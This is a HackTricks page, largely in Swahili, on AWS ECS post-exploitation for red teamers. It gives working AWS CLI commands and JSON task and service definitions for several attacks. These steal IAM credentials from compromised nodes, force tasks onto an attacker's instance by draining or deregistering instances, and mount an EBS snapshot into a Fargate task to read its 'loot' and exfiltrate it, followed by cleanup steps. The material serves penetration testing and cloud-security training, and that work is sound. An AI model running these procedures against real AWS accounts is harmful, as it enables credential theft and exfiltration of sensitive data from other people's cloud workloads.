AWS - ECS Post Exploitation

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

ECS

Kwa taarifa zaidi angalia:

AWS - ECS Enum

Host IAM Roles

Katika ECS, IAM role inaweza kuambatishwa kwa task inayokimbia ndani ya container. Ikiwa task inakimbizwa ndani ya EC2 instance, instance ya EC2 itakuwa na IAM role nyingine imeambatishwa kwao.
Hii inamaanisha kuwa ikiwa utafanikiwa compromise instance ya ECS unaweza kwa uwezekano kupata IAM role inayohusiana na ECR na instance ya EC2. Kwa habari zaidi kuhusu jinsi ya kupata credentials hizo angalia:

Cloud SSRF - HackTricks

Caution

IMDSv2 with a hop limit of 1 does not block awsvpc or host-networked tasks—only Docker bridge tasks sit far enough away for the responses to die. See ECS-on-EC2 IMDS Abuse & ECS Agent Impersonation for the full attack workflow and bypass notes. Recent Latacora research shows that awsvpc and host tasks still fetch host credentials even when IMDSv2+h=1 is enforced.

Privesc to node to steal other containers creds & secrets

Zaidi ya hayo, EC2 inatumia docker kuendesha ECS tasks, hivyo ikiwa unaweza kuepuka hadi node au kupata the docker socket, unaweza kuangalia ni container nyingine zipi zinaendeshwa, na hata kuingia ndani yao na kunyakua IAM roles zao zilizoambatishwa.

Making containers run in current host

Zaidi yake, EC2 instance role kawaida itakuwa na permissions za kutosha za kusasisha container instance state ya instances za EC2 zinazotumika kama nodes ndani ya cluster. Mshambuliaji anaweza kubadilisha state ya instance kuwa DRAINING, kisha ECS itakuwa ikiondoa tasks zote kutoka kwake na zile zinazoendeshwa kama REPLICA zita endeshwa kwenye instance tofauti, kwa maana zinaweza kuendeshwa ndani ya instance ya mshambuliaji, hivyo anaweza kunyakua IAM roles zao na taarifa nyeti zinazoweza kuwepo ndani ya container.

aws ecs update-container-instances-state \
--cluster <cluster> --status DRAINING --container-instances <container-instance-id>

Mbinu ile ile inaweza kufanywa kwa kuondoa usajili wa instance ya EC2 kutoka kwa cluster. Hii inaweza kuwa si ya siri lakini italazimisha tasks kutekelezwa katika instances nyingine:

aws ecs deregister-container-instance \
--cluster <cluster> --container-instance <container-instance-id> --force

Mbinu ya mwisho ya kulazimisha utekelezaji upya wa tasks ni kuonyesha kwa ECS kwamba task or container was stopped. Kuna 3 APIs zinazowezekana za kufanya hivi:

# Needs: ecs:SubmitTaskStateChange
aws ecs submit-task-state-change --cluster <value> \
--status STOPPED --reason "anything" --containers [...]

# Needs: ecs:SubmitContainerStateChange
aws ecs submit-container-state-change ...

# Needs: ecs:SubmitAttachmentStateChanges
aws ecs submit-attachment-state-changes ...

Steal sensitive info from ECR containers

The EC2 instance will probably also have the permission ecr:GetAuthorizationToken allowing it to download images (you could search for sensitive info in them).

Mount an EBS snapshot directly in an ECS task (configuredAtLaunch + volumeConfigurations)

Tumia native ECS EBS integration (2024+) kuunganisha yaliyomo ya snapshot ya EBS iliyopo moja kwa moja ndani ya task/service mpya ya ECS na kusoma data yake kutoka ndani ya container.

  • Inahitaji (kiasi cha chini):

  • ecs:RegisterTaskDefinition

  • One of: ecs:RunTask OR ecs:CreateService/ecs:UpdateService

  • iam:PassRole on:

  • ECS infrastructure role inayotumika kwa volumes (policy: service-role/AmazonECSInfrastructureRolePolicyForVolumes)

  • Task execution/Task roles zinazorejelewa na task definition

  • If the snapshot is encrypted with a CMK: KMS permissions for the infra role (the AWS managed policy above includes the required KMS grants for AWS managed keys).

  • Impact: Soma yaliyomo yoyote ya diski kutoka snapshot (mf., database files) ndani ya container na exfiltrate via network/logs.

Steps (Fargate example):

  1. Create the ECS infrastructure role (if it doesn’t exist) and attach the managed policy:
aws iam create-role --role-name ecsInfrastructureRole \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ecs.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name ecsInfrastructureRole \
--policy-arn arn:aws:iam::aws:policy/service-role/AmazonECSInfrastructureRolePolicyForVolumes
  1. Sajili task definition yenye volume iliyotajwa configuredAtLaunch na ui-mount kwenye container. Mfano (huchapisha secret kisha inalala):
{
"family": "ht-ebs-read",
"networkMode": "awsvpc",
"requiresCompatibilities": ["FARGATE"],
"cpu": "256",
"memory": "512",
"executionRoleArn": "arn:aws:iam::<ACCOUNT_ID>:role/ecsTaskExecutionRole",
"containerDefinitions": [
{"name":"reader","image":"public.ecr.aws/amazonlinux/amazonlinux:latest",
"entryPoint":["/bin/sh","-c"],
"command":["cat /loot/secret.txt || true; sleep 3600"],
"logConfiguration":{"logDriver":"awslogs","options":{"awslogs-region":"us-east-1","awslogs-group":"/ht/ecs/ebs","awslogs-stream-prefix":"reader"}},
"mountPoints":[{"sourceVolume":"loot","containerPath":"/loot","readOnly":true}]
}
],
"volumes": [ {"name":"loot", "configuredAtLaunch": true} ]
}
  1. Unda au sasisha service kwa kupitisha EBS snapshot kupitia volumeConfigurations.managedEBSVolume (inahitaji iam:PassRole kwenye infra role). Mfano:
{
"cluster": "ht-ecs-ebs",
"serviceName": "ht-ebs-svc",
"taskDefinition": "ht-ebs-read",
"desiredCount": 1,
"launchType": "FARGATE",
"networkConfiguration": {"awsvpcConfiguration":{"assignPublicIp":"ENABLED","subnets":["subnet-xxxxxxxx"],"securityGroups":["sg-xxxxxxxx"]}},
"volumeConfigurations": [
{"name":"loot","managedEBSVolume": {"roleArn":"arn:aws:iam::<ACCOUNT_ID>:role/ecsInfrastructureRole", "snapshotId":"snap-xxxxxxxx", "filesystemType":"ext4"}}
]
}
  1. Wakati task ikianza, container inaweza kusoma yaliyomo ya snapshot kwenye configured mount path (mfano, /loot). Exfiltrate kupitia network/logs za task.

Usafishaji:

aws ecs update-service --cluster ht-ecs-ebs --service ht-ebs-svc --desired-count 0
aws ecs delete-service --cluster ht-ecs-ebs --service ht-ebs-svc --force
aws ecs deregister-task-definition ht-ebs-read

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks